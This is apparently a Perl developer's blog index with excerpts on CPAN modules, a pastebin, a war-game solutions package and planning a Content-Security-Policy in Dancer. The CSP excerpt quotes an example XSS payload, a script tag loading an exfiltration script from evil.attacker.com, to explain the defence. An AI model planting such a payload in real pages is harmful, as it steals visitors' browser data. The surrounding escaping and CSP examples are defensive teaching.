Introducing Hack::Natas

Last Monday, I presented my solutions to the Natas server-side security war games at NSLUG. Afterwards, I spent some time cleaning up my code, and I’ve now published it to CPAN as Hack::Natas, which comes with modules and scripts to solve levels 15 and 16 in an automated way, plus walkthroughs for all the levels up to 17 written in Markdown (those are almost the same as my blog posts, so you’re not missing out by looking at only one or the other).

Introducing mvr: like mv, but clever

I wanted to move a large number of files from one directory to another, but many of the filenames were already in use in the target directory. This is a common enough problem – digital cameras use DSC#, video downloaders often append numbers to get a unique filename, and so on. In both those examples, the sequence restarts when you empty the program’s work directory, so you’ll end up with DSC0001.jpg every time you empty your camera’s memory card. If you’re trying to move such files into a single directory, you’ll get conflicts every time.

Instead of manually renaming the files before transferring them, I wrote a simple script to give each file a unique name in the destination directory.

Introducing Noose: just enough OO to hang yourself

Moose led to Mouse led to Moo led to Mo led finally to M, which gives you the least object-orientation possible, which is none at all. I quipped that Perl desperately needed a new OO module called Noose – just enough object orientation to hang yourself.

Planning a Content-Security-Policy with Dancer

The same-origin policy is a fundamental part of the security infrastructure of the web. It prevents a web site’s scripts from accessing and interacting with scripts used on other sites. This helps keep your data safe because if your bank’s website gives you some data, it can only be accessed by your bank’s website, and not by scripts from other websites.

That’s a nice theory, it’d be a shame if some evidence happened to it.

In the real world, attackers have found ways to get around the same-origin policy to gain access to data they’re not supposed to be able to access. For example, a web programmer might mistakenly include some user-provided input verbatim in the HTML of a webpage – perhaps a username. Well, if your username is <script type="text/javascript" src="http://evil.attacker.com/exfiltrate_browser_data.js"></script>, then how is the web browser supposed to know if that was intentionally put in the HTML of the page? Same-origin policies are insufficient in the face of programmer error. Enter Content Security Policy.
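As an added illustration (not code from the post), here is what the two defences look like side by side in a Dancer 1 application: output escaping stops the username from being interpreted as markup, and a Content-Security-Policy header sent from an after hook tells the browser not to load scripts from anywhere but the site’s own origin, even if an escaping bug slips through. The policy value, the route and the html_escape helper are my assumptions, not the post’s.

```perl
#!/usr/bin/env perl
use strict;
use warnings;
use Dancer;

# Added example, not from the post. Send a restrictive CSP on every response:
# with default-src limited to 'self', an injected
# <script src="http://evil.attacker.com/..."> is refused by the browser.
# The exact policy is an assumption; a real site would list the origins it uses.
hook after => sub {
    my $response = shift;
    $response->header('Content-Security-Policy' => "default-src 'self'");
};

# Escape untrusted data at the point it is written into HTML. CSP is defence
# in depth; this is still the primary fix for the username problem above.
sub html_escape {
    my $s = shift;
    my %map = (
        '&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
        '"' => '&quot;', "'" => '&#39;',
    );
    $s =~ s/([&<>"'])/$map{$1}/g;
    return $s;
}

# Hypothetical route: the :name parameter is user-controlled.
get '/hello/:name' => sub {
    my $name = html_escape(param('name'));
    return "<html><body><p>Hello, $name</p></body></html>";
};

dance;
```

Requesting /hello/%3Cscript%3E with this running shows the literal text &lt;script&gt; in the page source rather than a script element, and the response carries the Content-Security-Policy header, which you can confirm with curl -i.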

Introducing File::Symlink::Atomic

In Tips & tricks from my 4 months at Pythian, I showed how to give a symlink a new target atomically. I wasn’t aware of any module to encapsulate that, so I quickly put together File::Symlink::Atomic. This module is useful because it eliminates the need to know how to do this safely – simply use File::Symlink::Atomic and you get a drop-in replacement for CORE::symlink. It creates a temporary symlink (using File::Temp to get a unique pathname) pointing to your new target, then moves it into place with a rename call.
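The technique described above, written out as an added example rather than the module’s own source: a temporary name comes from File::Temp, symlink() is what actually claims the name (so a collision just means picking another one), and rename() swaps the new link over the old one in a single step, so a reader of the link never sees it missing. The function name symlink_atomic and the .symlink-XXXXXXXX template are my assumptions.

```perl
#!/usr/bin/env perl
use strict;
use warnings;
use Errno qw(EEXIST);
use File::Basename qw(dirname);
use File::Temp qw(mktemp);

# Added example, not File::Symlink::Atomic itself. Point $link at $target
# without any window in which $link does not exist.
sub symlink_atomic {
    my ($target, $link) = @_;

    # The temporary link must live in the same directory as $link, otherwise
    # rename() could cross filesystems and stop being atomic.
    my $dir = dirname($link);
    my $tmp;
    while (1) {
        # mktemp only generates a name; creating the symlink is the atomic claim.
        $tmp = mktemp("$dir/.symlink-XXXXXXXX");
        last if symlink($target, $tmp);
        # Someone else took that name: try another. Any other error is fatal.
        die "symlink $tmp: $!" unless $! == EEXIST;
    }

    # rename(2) replaces an existing $link (file or symlink) in one step.
    unless (rename($tmp, $link)) {
        my $err = $!;
        unlink $tmp;    # do not leave the temporary link behind
        die "rename $tmp -> $link: $err";
    }
    return 1;
}

# Usage: repoint a "current" link from one release directory to the next.
symlink_atomic('releases/v2', 'current') if @ARGV && $ARGV[0] eq '--demo';
```

Note that the target is stored verbatim, so a relative target is resolved relative to the directory containing the link, exactly as with a plain symlink.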

Wordpress theme for hashbang.ca

In the past month, a number of people have asked about the theme for this blog. I was particularly flattered that someone even asked where I bought it. It is just a customized version of Joey Robinson’s Minimalist theme. My aim was to keep the same design principles – fast-loading, minimalism, readability – but update it to have a more modern look. One major goal was to have a truly great font via @font-face on modern browsers, so I used the Junction font from The League of Movable Type.

A pastebin with almost no user interface

I’ve always favoured pastebins that let you bin a paste and nothing more – p.defau.lt and sprunge.us spring to mind. I’ve made a Perl almost-clone of sprunge.us: https://p.hashbang.ca now runs WWW::Hashbang::Pastebin, a simple pastebin written with Dancer and DBIx::Class that does nothing but store your text and show it back to you. The only feature beyond that is if you append a +, you’ll get line numbering (no syntax highlighting). You can use an anchor to jump to any line (click the line number), and the number for that line will be highlighted.

Introducing utf8::all

Perl programmers are probably all aware of the utf8 pragma, which turns on UTF-8 in your source code. This is actually a stumbling block for new programmers, who might think that utf8 makes your filehandles use UTF-8 by default, or automagically turns incoming data into UTF-8, and ensures outgoing data is all UTF-8 as well. Sadly, that’s not the case.

However, one of the great things about perl5i is that it turns on Unicode. All of it.

CLI Perl syntax highlighter

Last night, someone posed a problem in #perl-help. They wanted to have syntax highlighting in their shell for Perl code. I immediately suggested that they use Pygments – I knew about it because I’d used it before, and I had experimented with the command line tool. But I was surprised there wasn’t already a Perl solution.